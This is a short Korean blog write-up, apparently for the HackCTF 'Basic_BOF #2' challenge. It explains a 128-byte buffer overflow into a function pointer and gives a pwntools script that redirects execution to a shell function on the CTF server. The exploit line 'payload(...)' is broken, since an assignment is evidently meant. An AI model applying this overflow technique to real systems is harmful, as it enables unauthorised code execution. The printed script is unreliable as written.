War Game
HackCTF Basic_BOF #2 Write Up
지현근
2020. 3. 7. 19:08
반응형
이번에는 문제를 다운받고 file명령으로 파일을 확인하자
32비트 파일이다.
IDA로 까보자
빠르게 거리부터 구하자
자 이제부터 분석을 해보도록 하자
s는 128만큼의 크기가 있고 fgets함수에서 133바이트만큼 입력받기 때문에
역시나 bof하기에는 충분해 보인다.
s는 sup함수를 가르키고 있는걸로 보인다.
IDA에서 함수목록을 보던 중 shell함수를 찾게 되었다.
pwntools로 간단하게 풀자
from pwn import *
p = remote("ctf.j0n9hyun.xyz", 3001)
payload("a"*128+"\x9B\x84\x04\x08")
p.sendline(payload)
p.interactive()
반응형